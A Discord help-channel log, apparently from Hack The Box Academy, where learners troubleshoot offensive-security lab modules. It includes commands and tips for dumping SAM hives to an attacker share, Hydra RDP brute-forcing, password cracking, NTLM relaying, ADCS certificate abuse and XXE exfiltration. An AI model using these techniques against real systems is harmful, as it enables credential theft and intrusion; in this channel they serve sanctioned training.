#modules

1 messages ยท Page 417 of 1

drowsy storm
#

@fathom pendant Marcielee bro i have created a shell script to find the python version and i have pasted pythonx x.y.z | x.y.z and i didn't try x.y XDDDDDDDD

quasi wave
#

I looked at both but the "credentials" one doesn't list the exact credentials or at least I'm not reading it right

#

the other file lets me log in as the user from my VM tho

fathom pendant
#

My secret was python<tab x3> and see the autocomplete suggestions

cloud urchin
quasi wave
drowsy storm
#

oh nice one i thought i need to have it this pattern pythonx x.y.z | x.y.z

#

happy to chitchat with you, thx

quasi wave
#

I think I am not reading the file correctly

#

@cloud urchin can I DM you?

#

it says the user account but it doesn't say they password

cloud urchin
# quasi wave I am using that format

There is no trick. You read the files in the directory as the question says. Once you find the credentials you input them into the answer box in the format it states. If it's not accepting it you either don't have the right credentials or aren't using the correct format.

quasi wave
#

hi there's only two files in one of the home directories. I'm looking at the one that should have the credentials. can I DM you to make sure I have the right file?

#

@cloud urchin I'm only asking because I think I may just have a formatting issue but I don't see how

cloud urchin
#

ok

waxen totem
#

(You have to pivot first)

quasi wave
#

hi I solved question 2

#

so now I'm gonna take a break for a few hours and try again later.

#

but I will finish the skills assessment soon

#

I may continue the skills assessment tonight after I get some other work done

terse sedge
#

I'm in Password Attacks - Attacking SAM. Question 2. I have brought over the SAM, SYSTEM, AND SECURITY hives to my local machine successfully. When I try to run secretsdump.py on them, I get the following error repeatedly: 'NoneType' object is not subscriptable. I have tried copying the command directly from the module, and I still get this error.

#

Any suggestions?

gray yacht
#

Can you DM your command and output?

cloud urchin
#

Try using impacket-secretsdump instead of the .py file

#

otherwise what r1cky said may be on to something

terse sedge
#

I moved them using "move sam.save \10.10.15.16\CompData" on the remote windows machine.

#

One interesting thing I've noticed is that all three of them are exactly the same size, and generate the exact same hash

#

That's while still on the remote machine

devout spruce
#

Can someone please help me with the Attacking Thick Client Applications? I'm honestly lost on what to do and I'm not able to find or do certain things that the module is saying to do. I've been at this for awhile now. I can't change the permissions of the temp folder to disallow file deletions and it's preventing me from moving on.

cloud urchin
devout spruce
cloud urchin
#

The section's target is that box.

devout spruce
# cloud urchin The section's target is that box.

Was able to solve the previous issue I had, just wasn't reading clearly, but I definitely feel like this section should be rewritten or something. Cause I was pretty lost going through it. I'll keep going through IppSec's video once I give my mind a rest and see if I can get anywhere.

cloud urchin
#

Yeah I've seen a lot of complaints about that module, feels a bit out of place for the course.

#

@narrow fog I deleted your post because you linked to your pwnbox with the password that anyone could connect to. probably don't want to link that.

narrow fog
#

Did I just pasted my pwnbox url?

cloud urchin
narrow fog
#

oops. Thank you

rustic sage
#

Password Attacks - Mutations:

"Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer."

Tried ssh, ftp & smb. What I am supossed to do now?

frigid ginkgo
#

Regarding Puppy, why did Winrm prompt authentication failure when I changed the password of another account using my account? Before that, I was able to obtain a shell. Will changing the password by others affect me?

cloud urchin
waxen totem
round marten
#

Thanks, but we ended up sorting this out. It's unclear what's a spoiler and what I should post as an errata, but the DEV box and EXPLOIT box don't appear to be the same

waxen totem
#

did you use the mutations in the section or in the resources?

waxen totem
rustic sage
waxen totem
dry parcel
#

Hello

waxen totem
rustic sage
waxen totem
#

now just extend target time as much as possible cos it took mine 2 hours to get

rustic sage
#

Did you do FTP or SMB?

waxen totem
waxen totem
# dry parcel Hello

Heya! Welcome to HTB Discord server, please read #rules and get your account identified, #welcome has the instructions. And you'll be able to access other channels

rustic sage
#

Hey all, I'm doing the Network Foundations module, but in the Wireless Networks section, I think there may be a bug on this question: What is used by a mobile hotspot to connect devices to the internet? (Format: two words)

shut wraith
#

NVM ! it just took a bit of time

fathom pendant
#

@plain folio don't just give answers;
@rustic sage i suggest reading the module as the answers typically lie in the reading

rustic sage
waxen totem
fathom pendant
#

you can adjust the threads with -t

#

~48 - 56 threads seems to be the most stable while being the fastest

clear bronze
#

Hello. Just joined

cloud urchin
clear bronze
#

I'll be sure to check it out

craggy sky
#

Ada orang indo ga di sini

cloud urchin
craggy sky
#

Ok

#

โ€ข โ€œIs there any Indonesian here

cloud urchin
devout spruce
#

Okay so back again and still having issues with Attacking Thick Client Applications. I watched the Ippsec video and he doesn't exactly cover the section I'm stuck on, he covers the section following it. I've went ahead and tried following the instructions for the section I'm on where you have to retrieve the hardcoded credentials by first restarting OracleService.exe and use ProcMon64 to find the process for it, but I'm unable to find it. At this point, I'm stuck on what to do, and this section does not explain the process well at all. I could really use some guidance on this.

waxen totem
fathom pendant
waxen totem
fathom pendant
#

but tbf, the thick client sections are the worst sections of that module

fathom pendant
waxen totem
#

Yeah for the web exploitation part of it I followed 0xdf and ippsec (doesn't help that they have different methods) and still had to do some java compilation debugging that was never taught in the pathway... I really think those sections are out of place

devout spruce
waxen totem
# devout spruce Yes that's the one

make sure to put the right breakpoint and check in the bottom left if the application is paused before looking around for the memory address and dumping it

#

it can be annoying to find it if it keeps moving around kek

devout spruce
# fathom pendant this one i was able to do it step-by-step and it worked just fine

I've tried going through the steps multiple times and I'm unable to get the same results showed in the section. Was able to find the process after running ProcMon64 again but at the Permission Entry for Temp portion where you have to change permissions, it's saying permission denied even though I was able to change the permissions a few hours ago on my first attempt. Very confusing. I'm also not getting the .bat or .tmp file you're supposed to get either in the Temp folder.

waxen totem
devout spruce
#

Makes sense, restarting it now so hopefully it will work next go around

waxen totem
devout spruce
waxen totem
junior fjord
#

Again same problem ๐Ÿ˜” :- now just guide me how to and what to configure if we found anything like this ( IP + domain )

#

Yesterday I faced same issues but, one Gentelmen guide me and solved that but again I am facing same thing and even after repeating the that Gentelmen's steps I can't able to do

waxen totem
waxen totem
paper tiger
#

Send a screenshot when done

junior fjord
junior fjord
#

Here what I encountered :-

Step 1 :- added IP in /etc/hosts file as instructed yesterday โœ…

Step 2 : I also able to access the website with domain โœ…

Step 3 : but when it comes to DNS bruteforcing, it doesn't works โŽ

( I uploaded photos also step wise )

junior fjord
waxen totem
junior fjord
#

Then how I continue my learning ๐Ÿ˜”๐Ÿฅฒ I have to skip this skill assessment ? Or any solution ?

wooden seal
#

and are you using it like this? (inlanfreight.htb:port_here)

waxen totem
junior fjord
wooden seal
junior fjord
#

Ok trying

wooden seal
#

otherwise follow what 0xW1Ld is saying

junior fjord
wooden seal
junior fjord
#

Information gathering-web edition

wooden seal
#

sub module?

#

virtual hosts?

junior fjord
wooden seal
#

okok

#

use ports

#

with domain

waxen totem
wooden seal
#

idk if he tried that or no

wooden seal
#

oh lemme recheck then

#

wrong mode

junior fjord
#

Ya

wooden seal
#

u got it?

junior fjord
#

It started bruteforcing but didn't found anything I tried this

#

Gobuster is bruteforcing but didn't found anything which is strange, it's not hard or medium lab ๐Ÿ˜ฐ

wooden seal
#

try using vhost instead of dns

junior fjord
#

Ok trying....

acoustic owl
wooden seal
#

oh yea ^ this too (i missed it)

acoustic owl
#

The Hosts file is responsible for name resolution, similar to an A or AAAA entry.

waxen totem
#

you had it right earlier, what happened? kek

wooden seal
#

he experimented ig xD

junior fjord
wooden seal
#

it works just give url like this (domain:port)

junior fjord
#

It not accepta domain:port this format in DNS bruteforcing

wooden seal
#

do vhost bruteforce

junior fjord
#

Ya

#

Tried Vhost but it also keep bruteforcing not getting anything ๐Ÿฅฒ

Again it's not hard machine, butt.....

wooden seal
#

now we wait

junior fjord
#

now my second last option is chatGPT i am telling my problem and he try to resolve....... kekhands

lusty stag
#

Is someone able to explain something to me why in XXE file reading using the <!CDATA[[]]> tags does not work to read a file such as /etc/passwd, but works to read the specific file such as /flag.php?

#

As far as I can tell, there should be no reason why one can be read but the other can't, when both exist

#

I understand that the idea of using the CDATA tag is to make the XML program interpret it as raw data, but why isn't that possible with ALL files, only specific ones?

#

I get why you can't read index.php ( to avoid a self-reference loop for DOS protection ) but the inability to read /etc/passwd is confusing me

waxen totem
lusty stag
#

Yes, positive, I checked using the typical method too

#

Which works perfectly fine, but the CDATA techniques does not

#

I also know my .dtd file is being read, as I can see it making requests to the file from the python webserver

waxen totem
#

I'm gonna warrant it to a data size limit

#

you can get /etc/hosts fine right?

lusty stag
#

Yes I can!

#

I never considered that - how can I tell what the limit is?

waxen totem
lusty stag
#

Fair enough - how else can you exfiltrate binary data if there's a limit though?

#

Thank you, by the way, I was getting very confused by that

junior fjord
#

hey, i tried chatGPT too but it also does't able to give me what i want. i finally skipping this skill assesment and one question from all :- IN REAL CPTS EXAM, CAN WE ENCOUTER THIS TYPE OF THINGS LIKE IP + DOMAIN BOTH ? IF YES THEN I DEFINATLY GONNA FAIL THE EXAM ๐Ÿ˜ฉ hmmmHug PLEASE ANSWER ME......................

junior fjord
#

I AM CALMED SIR ๐Ÿ˜… BUT just want to know, i have to suffer somthing like this in exam also ? BTW in CPTS exam i only gifted with the IP or both IP + DOMAIN ? like i mean to say that " exam is like solving CTF " (single IP) or anything elsee ?

waxen totem
#

You'll have to learn how to unstuck yourself, this is an easy module mind you.

junior fjord
#

ya, i tried every single trick yours and AI but none of these worked

lusty stag
#

It looks like you're close, from the messages I've seen

waxen totem
#

same, it's really just a waiting game with this kek

gritty kelp
#

Hello guys, web cache posioning module, at the end of it โ€œtools & preventionโ€, i have found the vulnerable parameter using wcvs, however i cant find the correct answer format for the question, any help?

junior fjord
#

i retried with dnsenum but this guy also spits same

waxen totem
junior fjord
#

tried but no response till at the end !

waxen totem
#

like wayy bigger

junior fjord
#

ok trying.........................

#

wayy bigger

waxen totem
#

be prepared to wait a while you can also use the -t flag to increase the speed

thorny kraken
#

Tbf 50 threads is pretty big... what t count do people use?

waxen totem
thorny kraken
#

Haha nice

#

I use like 20 usually, maybe i should up it

lusty stag
#

I thought the threads were based on the number of available CPU cores - how is it allocated in FFUF/gobuster?

#

For instance, a 8 core cpu, with two threads for each core would be 16 threads

thorny kraken
#

I think monitoring usage during the scan is the best i guess

waxen totem
zinc halo
#

Hi, I was wondering if there is rule of thumb to know when should we select eternalromance over eternalblue because it seems they are used interchangeably in the academy module. thanks!!

waxen totem
scarlet halo
#

Hello,

if I can find more documentation regarding .This part .I want to understand it better.Seems some parts are missing

zinc halo
waxen totem
zinc halo
waxen totem
zinc halo
#

that make sense

junior fjord
#

but only foung 1

waxen totem
#

@junior fjord don't spoil the skill assessment please

fathom pendant
#

don't spoil module content =+=

waxen totem
fathom pendant
#

i literally just turned over

junior fjord
#

its not the answer

waxen totem
#

you're close, just do a lil digging around

junior fjord
#

its not any type of answer

fathom pendant
#

is it the ffuf module or the fuzzing module?

#

also

junior fjord
#

ok

waxen totem
fathom pendant
#

ah

#

yeah plenty of techniques used

junior fjord
waxen totem
fathom pendant
#

i'm losing my touch, used to be able to determine based on the spoiled info kek

novel valve
#

Im doing the Skills Assesment in module "Information Gathering - Web Edition " ... is it better to recon manually for the exam or can i automated it? Any other results?

junior fjord
#

like you are not encountring any issues ?

novel valve
#

Make good Notes from the module and i have all commands at my "cheatsheet" and go from up to down...

hardy sparrow
#

hi not sure if this is okay but is it possible to use a pwnbox from htb academy on htb labs?

acoustic owl
midnight ridge
#

can anyone help me to abuse ADCS ESC1 please?

#

I have requested successfully certificate for the privileged account (DA)

#

but the problem comes when I try to get the TGT with Rubeus asktgt, it shows me the error
KRB-ERROR (66) : KDC_ERR_CERTIFICATE_MISMATCH

#

I have searched and find out the issue is on the mapping process, so when I request cert, I add one more option is sidextension of the target account, but it still does not work

#

how can I get the TGT with the obtained cert?

hardy sparrow
#

so I was wondering if it was possible to use the pwnbox from academy on labs

acoustic owl
hardy sparrow
#

I was thinking more like setting OVPN on the academy pwnbox

#

I tried it but got an error

acoustic owl
#

Use your own VM instead

narrow mist
eager chasm
#

I was following along with the Linux set up module on my laptop through VirtualBox using the parrot htb os. I got as far as LVM Passphrase following the general steps and creating my own passphrases and user login for my system. As I waited for the Debian program to finish installing. Once finished the system restarted as expected per the module but upon reboot I was not prompted with the encryption passphrase GRUB section as seen in the module and it seemed like the system had simply just restarted like the very beginning(when I originally started the VM). I am very confused as to why my system did not prompt me to enter any passphrase nor the option to login and boot up the operating system I just installed. If anyone may know where I went wrong or what may have happened please provide some guidance because I am completely lost.

west arrow
narrow mist
west arrow
waxen totem
west arrow
waxen totem
west arrow
#

๐Ÿ˜†

hard tree
hard tree
waxen totem
hard tree
#

Ummm I can't send the image even if I drag it here

waxen totem
#

I do not respond to unsolicited DMs

hard tree
waxen totem
#

since you're using kali it's probably in /usr/share/wordlists/seclists/<same from here>

rustic sage
# waxen totem

I left this running overnight, isn't it weird that it's not giving me any results?

gray yacht
turbid cargo
#

Anyone can see Genesis ProLab listed?

gray yacht
# rustic sage Yes.

Ok, wasn't sure. You can shoot me a DM and I can look at some things on your end.

young gale
#

Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

Previous section we found the username and password, now it's asking to crack the password for the MySQL service, am i supposed to keep the same username I got and then enforce a custom rule to do

sam:pass
sam:pass1
....

?

chilly grail
#

Hey
Good morning ๐ŸŒž
I'm new here ๐Ÿ‘‹๐Ÿผ

hardy plover
#

Hi
Iโ€™m at credential enumeration from window module.
How do i run powerview function

#

Itโ€™s AD enumeration and attacks module

gray yacht
gray yacht
gray yacht
# hard tree Did I do something wrong here?

If you don't know where it is, you can run sudo updatedb and then locate and the filename to see if it is on your VM.
Example:

/opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
/opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
/opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt```
hardy plover
hard tree
#

Oh I get it. Thanks!

manic obsidian
#

for the question One of the pages you will identify should say 'You don't have access!'. What is the full page URL? in Web Fuzzing

i have found the url that displays the 'You don't have access', but for some reason it keep saying it's invalid when trying to submit it

i have been putting it in the format: http://vhost.academy.htb:port/directory/page.extension
i tried it without the http, with and without the port, checked for any spaces but yet i can't seem it to get it to accept my answer

icy dagger
#

Hi guys, Just a question, are there any active channels for pro-labs?

storm elk
quick coral
#

Hey everyone, I just copped this cheap Wi-Fi adapter:
1300Mbps USB 3.0 WiFi Adapter Dual Band 2.4G/5Ghz, 4 Antennas, Realtek 8811CU chipset.
It was only $3.63, so I know itโ€™s probably a gamble. Does anyone know if it supports monitor mode or packet injection on Kali Linux? Has anyone tried hacking with this chipset or similar super budget adapters?

Would really appreciate any advice or tips! Thanks in advance ๐Ÿ™

elder matrix
#

hi! i started (and finished? ) the whole blind AEN thing im not sure if i achieved the goal since i didnt look at the step by step exercises .. is the "goal" to the blind AEN challenge to gain access to a domain admin account?

vernal tapir
#

Hey all I'm on Attacking Common Apps and trying to learn Aquatone Reporting but it isn't quite doing what it's showing on the lesson. It's failing every screenshot request is there something specific I need to be doing? The EyeWitness report worked perfectly

golden snow
#

hello guys, I'm new in HTB. I want to know why i need to do the Information Security Foundations. it is so boring and i don't get any good information or used one.

safe mango
dark hedge
#

you're free to not do the Information Security Foundations path

elder matrix
vernal tapir
dark hedge
#

you can also do lateral movement from domain admin

#

deleting that for spoilers

golden snow
#

ok thanks,
i have another question.
I'm in the SOC analyst.
I'm stack in Windows Event Logs & Finding Evil Module.
is there something that i need to learn first? for example there is recommendation tasks or modules from different paths that is at the bottom of my module. do i need to learn those first.

dark hedge
#

but now that you have domain admin, you may have gained access to something new

elder matrix
#

a bunch of machines... lots of them.. machines used by students

dark hedge
north elk
#

Hey guys, I'm new to HTB, been at it for a week now and just joined the discord.

Is there a section to discuss Active Machines in the Lab section..?

pallid nimbus
#

Hi, I'm in the module Windows Privilege Escalation at Windows Server, when I try to rdp on the victim box with

xfreerdp /v:10.129.254.133 /u:htb-student /p:HTB_@cademy_stdnt!

I get this error :

[10:37:12:158] [46273:46274] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

does anybody have the same issue ?

safe mango
north elk
#

Non retired machines.

north elk
dark hedge
#

you can access the channel once you verify your account -> #welcome

safe mango
north elk
#

Oh, no access to that channel atm @dark hedge I must have to do something. I'll figure it out!

north elk
pallid nimbus
dark hedge
safe mango
north elk
#

Thanks guys, I'll get sorted ๐Ÿ™‚

vestal minnow
safe mango
# pallid nimbus using the pwnbox

If you can change the pwnbox to udp it should work smother. That module has a lot of connection issues so regularly restarting can help

pallid nimbus
west arrow
#

are there any HTB machines to further practice the module "port forwarding, pivoting, tunneling" or it is just something that will be practiced anyway with further learning

vernal tapir
#

Yes I believe the ProLabs will test your skills on that (13 labs infact that include the module)

astral marlin
#

Hi, I am at the SCCM site takeover II section of the MSSQL, Exchange and SCCM attacks module, and when running the relay-sccm-adminservice branch of impacket I get the following error:


[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
Traceback (most recent call last):
  File "/home/kali/cape/mssql_exchange_sccm_attacks/sccm/relay-sccm/examples/ntlmrelayx.py", line 490, in <module>
    c = start_servers(options, threads)
  File "/home/kali/cape/mssql_exchange_sccm_attacks/sccm/relay-sccm/examples/ntlmrelayx.py", line 208, in start_servers
    c.setisADMINAttack(options.adminservice, options.logonname, options.displayname, options.objectsid)
    ^^^^^^^^^^^^^^^^^^
AttributeError: 'NTLMRelayxConfig' object has no attribute 'setisADMINAttack'. Did you mean: 'setIsADCSAttack'?```
#

Anyone have some ideas of why this is happening?

leaden island
#

yo guys im on attacking smtp section

#
โ””โ”€$ telnet 10.129.254.45 25
Trying 10.129.254.45...
Connected to 10.129.254.45.
Escape character is '^]'.
220 WIN-02 ESMTP
USER anonymous
503 Bad sequence of commands
VRFY root
503 Bad sequence of commands
RCPT TO                   
503 Bad sequence of commands
^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B
503 Bad sequence of commands
USER root
503 Bad sequence of commands
USER Administrator
503 Bad sequence of commands
#

smtp server acting wired not recognizing any command

west arrow
#

(The specific page you are on)

leaden island
west arrow
#

you first need to do that

leaden island
#

but the smtp server dosent recognize commands

west arrow
#

you need to use a tool that is specified in the page, with a userlist to find out the user

#

you are trying to log into the smpt service with a user that doesn't exist

leaden island
#

mhm so i wont need any direct interaction by me ?

west arrow
leaden island
#

alr

leaden island
#

its a yes no question Kappa

leaden island
#
  • okay
vestal minnow
#

yes

leaden island
#

Anyways

#

I did go throw it

#

I got the username

#

But brute forcing aganist it using the password list in the module not working for me

shut wraith
#

Hello can I please DM anyone about the sliver module -- would appreciate it

sterile hornet
#

Can anyone provide guidance for the CBBH Path : Skill Assesment ; Using Web Proxies?

novel valve
#

Are the Wi-fi modules on hackthebox good preparation for OSWP?

#

or are they generally good stuff?

west arrow
leaden island
#

tried pop3, imap, both smtp servers

#

also tried with rockyou for 20 mins

#

nvm figured it out

west arrow
clear seal
#

Anyone had trouble moving the system.save file from the target on the attacking Sam section of password attacks?

shut wraith
#

Module : Sliver

Anyone can please help as to why my rubeus doesnt return output on Beacon as it did on Session?

west arrow
clear seal
#

Correct, Iโ€™m trying to follow the modules, however, Iโ€™m about to do it another way lol.

devout spruce
#

Okay... so day 2 of trying to get through the first part of Attacking Thick Client Applications. I think there might honestly be something wrong with this exercise at this point. I talked about my issues in here yesterday but after trying to go through the exercise again I'm now unable to change the perms on the temp folder. Had this issue once or twice before but I've restarted the machine multiple times now and I'm still unable to change the perms when I was able to before.

west arrow
clear seal
#

I did.

#

It partially copies. Itโ€™s as if the connection gets interrupted before it finishes

#

Or moves rather, Iโ€™m trying a copy now

#

Nope, copy doesnโ€™t work either

#

It doesnโ€™t help that itโ€™s slow as hell RDPd into it.

#

Yeah, I even mapped a drive, and moved it with my mouse to the share. Itโ€™s losing connection before it can completely copy.

#

I gave up for now, Iโ€™m gonna try again when I get home to a better internet connection. Might have something to do with that, but I doubt or

#

It*

lime cosmos
#

i have problem in Protected Archives : password attack , the brute forcing take log time '

cold star
#

I dont think sharing this here is allowed might get you banned FeelsBadMan

fathom pendant
#

@paper jolt this really isn't a job board place

#

no module; iirc LaZagne is a python
no module named => you don't have the requisite python module installed

#

ยฏ_(ใƒ„)_/ยฏ

#

i don't recall having issues

#

Mac sucks Kappa ยฏ_(ใƒ„)_/ยฏ

clear seal
#

ugh!!!!

#

still breaks when I try to move the god damn system.save file

#

this is so frustrating......

shut wraith
clear seal
slim locust
#

are there any tips when it comes to looking for unmanaged PowerShell injection attacks?
Doing this module and I'm going through it, I feel like it does not really tell you how to detect it or ways to search for it, besides knowing where all the DLLs go.
lol

fleet socket
#

Have been facing some trouble related to brute-forcing RDP credentials using Hydra within Password Attacks > Network Services module. Can not seem to get a hit while using the provided wordlists. Below is the command I have been using:

hydra -L username.list -P password.list rdp://ip-address -f

Any pointers?

clear seal
#

finally got it lol

#

Jeez

left lintel
#

i have the site but idk it just keeps saying its wrong because of the format

gray yacht
left lintel
gray yacht
left lintel
#

yeah i think it was i didn't really read it much though i thought it was a hint to find the answer since it seems weird to have a hint to properly format an answer you already have

fleet socket
clear seal
clear seal
clear seal
fleet socket
#

Ahh, got it, appreciate the help. Feel a bit stupid after the past hour but learning something new nonetheless lol

clear seal
shut wraith
#

Thats the past u -- now ur better

sand rose
#

Hello. I'm on the "Getting Started" Module in the Pentester path... I'm doing the Nibbles box, and I'm all the way to trying to get the last reverse shell I need (For Root). I copy and paste everything and keep getting an error.... I have the initial foot hold and when I do the final sudo monitor.sh to execute, I get an error, but it doesn't kick me back to the shell... its stuck. If I CTRL+C, it takes me out of the shell entirely and I have to reset the entire box and do the steps again to get the shell back. (For some reason, setting up the NC listener again and using curl as before doesn't give me the shell back... but if I reset the box entirely, it does. I just want to cancel/get out of the command I'm running inside the shell without going all the way out.

Sorry, I'm tired and this quesiton was all over the place and incoherent. I hope I made enough sense for someone to help.

silent prawn
#

Hi everyone, Iโ€™m currently working on the skill assessment for the Advanced XSS and CSRF Exploitation module and Iโ€™ve hit a wall. Could someone please lend me a hand or point me in the right direction? Thanks in advance

junior fjord
#

Again :- I am in vulnerability assessment module and sub module is nessus skill assessment, but when I am trying to open nessus on given address it doesn't opening

mystic fjord
#

How do I delete data from the database? I dont like this new version of Bloodhound

#

I want to enter data from another domain but I don't want it to be mixed up with this one.

#

Its for the bloodhound module

wooden seal
#

Attacking Common Applications {Attacking Applications Connecting to Services}
in walkthrough they used breakpoint on address but in solution its not address.
Can someone explain why?i got 0 clue lol

novel valve
#

Good morning guys ๐Ÿ™‚
How good are the wifi modules on academy? Is it a good prep for OSWP? Do I learn there everything?

fathom pendant
#

don't post screenshots of modules above t0; your question was fine as it wasn't really spoiling anything; just be patient and someone may come along to assist you

#

just remember when you run mimikatz/hashdump/etc to dump the hashes of a machine, you're only dumping LOCAL hashes, there's no guarantee that the hashes/passwords will be the same across different machines in a network

#

if you're entirely sure you're doing everything right; try changing vpn regions (EU => US or US => EU) and trying again

#

sometimes that can actually make the difference

scarlet halo
#

Hello regarding the bruteforcing module : the password list change on the first assesment and it's impossible to do how can I report it?

fathom pendant
#

it's not impossible

scarlet halo
#

The wordlist is missing the key words

#

I have proof

fathom pendant
scarlet halo
#

Thanks

gaunt wren
#

Im currently on repeating request finding the second flag, I've all commands but I'm still getting the same flag, what am I missing ?

round fern
#

Module: Cracking Passwords with Hashcat

Optional Exercises:

You are conducting a penetration test for your client Inlanefreight and have Responder log data from the tool running overnight. You obtained the NTLMv2 password hash for the adconnectsvc user but all attempts to crack it have been unsuccessful. Recently, however, you read about another method to obtain something usable when you have an NTLMv2 password hash. Checking the project files from the previous year you also have the last NTDS dump to work with. Using Hashcat, find a way that you can leverage the NTLMv2 hash to authenticate as this user within the domain. Submit this string as your answer. Download the file "hashcat_addtnl_exercise.zip" from optional resources to get started.

Please, if anyone can help me to figure this one out. I know the answer (it's given to you if wanted) but cannot for the life of me figure out how to come to the conclusion.

From what I understand:
The responder log NTLMv2-SSP Hash is uncrackable for user (adconnectsvc)
The NTDS dump file does not contain the user adconnectsvc
The NTDS dump file is 3000+ users and one of these matches the user adconnectsvc, I assume this means they used the same password?
I know which user it is and I know the hash for the answer, but I am not able to connect the dots.

Would greatly appreciate some help here as I have spent a lot of time on this and would like to move on, without having to skip it.

soft moon
#

I've almost completed the Linux Privilege Escalation and boi was it fun I am just struggling to get the 4th flag and have root access for the skills assessment

eternal sun
#

Hello. Im at module/35/section/223 im capturing the flag using the Network tab under browserdevtools. However upon refresh the request to flag file is not present

fathom pendant
#

@soft moon please don't reveal info about the module since it's above tier 0

soft moon
#

sorry

brittle vortex
shadow canyon
#

Why I can't send messages in general each time it sends me here

shadow canyon
fathom pendant
fathom pendant
shadow canyon
#

Osint?

fathom pendant
#

OSINT isn't a newbie thing

#

lmao

#

at least not in-depth OSINT

shadow canyon
#

To me its look quiet easy I have seen ny brother who is preparing for oscp+ or something

fathom pendant
#

i suggest the "Information Security Foundations" Skill Path

shadow canyon
#

So anyways from where should i start

#

I want to be in red team

fathom pendant
#

AI Red Teamer path != Red Teamer

#

and you're trying to run before you walk

#

start with the basics and the fundamentals and move from there

shadow canyon
#

Is it course ? And if it is then how long is it I mean day wise

fathom pendant
fathom pendant
shadow canyon
#

On what platform should I make my notes ?

fathom pendant
#

I use Obsidian, some people use Cherry Tree or Notion

shadow canyon
#

All are free ? i mean those notes platform sorry for half message

fathom pendant
#

not all of HTB content is free i think a couple are tier 1; but the tier 0 modules are "free"

#

Yes

#

Note taking tools mentioned are free

#

ยฏ_(ใƒ„)_/ยฏ

shadow canyon
#

Ok noted

thorny kraken
fathom pendant
#

they are just starting out

#

so i don't think they use any note taking software

thorny kraken
#

My bad, terrible joke lol

fathom pendant
#

literally saw their sibling studying for OSCP+ and thought "it's easy"

#

i don't wanna shatter their dreams

thorny kraken
#

Having a sibling go through it must be pretty beneficial to be fair

shadow canyon
shadow canyon
lime cosmos
#
john hash2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2025-05-20 12:22) 0g/s 14787Kp/s 14787Kc/s 14787KC/s "2parrow"..*7ยกVamos!
Session completed. 
โ•ญโ”€kali@kali ~/doc 
โ•ฐโ”€$ john hash2 --wordlist=/home/kali/Downloads/<*********> 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<*********>       (Notes.zip/notes.txt)     
thorny kraken
fathom pendant
lime cosmos
#

why in the first cracking the pass it not work it stop and in the second it success crack the pass

fathom pendant
#

not all wordlists are created equal

#

unless both wordlists are rockyou, then idk

shadow canyon
lime cosmos
#

no they are not the same wordlist

thorny kraken
#

I guess one wordlist just had better content

lime cosmos
#

yes but the rockyou should work

#

idk why lol

thorny kraken
#

I thought it did work.... unless i missread

shadow canyon
acoustic owl
#

There are generally no videos in the Academy

thorny kraken
bronze bobcat
#

Is there anyone here who knows why I don't get a meterpreter shell in htb academy AD Enumeration & Attacks - Skills Assessment Part I, second question?

hollow umbra
#

Hello all, any hint regds designing oracle at blind sql? i dont understand in which context to use suggested base query for rows...

young gale
#

Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

user and password is found, just having issues not being able to figure what to do here

Password Attacks
Password reuse / default passwords

thorny kraken
young gale
thorny kraken
#

I'm confused by your question, so you haven't found the credentials?

young gale
thorny kraken
#

Ah right okay

young gale
#

So now, i dont know what approach i need to take

thorny kraken
#

Did you use the same method as the module?

fathom pendant
#

You don't need to use any attacking tools

young gale
young gale
tardy zenith
#

Hello

fathom pendant
young gale
#
ERROR 1698 (28000): Access denied for user 'root'@'localhost'

hazy lance
#

hi guys!

im in the shells and payload module, and im trying to do the exercice of the php web shells, but i have a problem.

#

i can connect to the web, and the target host is alive, but when i try to access to some sections of the web it don't respond

#

i need to interact to the web because i must to perform a specific request and put the php payload on it

#

idk if someone had the same error or if is problem of the lab, please helpppp

west arrow
#

Iv'e been over an hour trying to solve it with chatgpt but nothingkek

waxen totem
#

gem install sha3 maybe?

west arrow
waxen totem
west arrow
#

i get the same error

waxen totem
#

try yeeting that error into chatGPT

west arrow
#

it's what ive been doing and it is driving me nuts

#

i'll just give it another try

rain marsh
#

Hello everyone, i have been solving Offshore Prolab. Pwned all machines. But not able to get one last flag. We can do better than this. Can some one help me?

fathom pendant
shadow canyon
fathom pendant
#

htb academy has labs in most of the sections to practice what they teach

storm elk
#

Marcie - can I dm you with a question related to content? My memory is not serving well

fathom pendant
#

you can use your own vm or the in-browser pwnbox

shadow canyon
#

can i use the open ai for questions or commands where i got the issues ?

fathom pendant
storm elk
fathom pendant
shrewd vigil
#

Hello! I'm having a lot of trouble with the "Skills Assessment" section of the Cross-Site Scripting module. I don't want to give away anything here, but I'm pretty sure I've found the vulnerable field and the right kind of payload, but it's very sporadic. For example, sometimes a test payload will work, and then I'll change it to a similar payload to exfiltrate the info that I want, that WON'T work, and then when I test the previous payload again, it won't work either, and I won't be able to get it to work with anything for a while, until some later test works again.

Also, I've noticed that after resetting the machine, sometimes the previous test payload won't work, but a different one will, but again it's really finicky.

I've tried resetting the machine multiple times, and I've also tried from both my own Kali VM over the VPN and from the Pwnbox, but I'm running into similar issues in both cases.

Is there anyone here who can help me with this? Maybe over DM so we don't give away any spoilers?

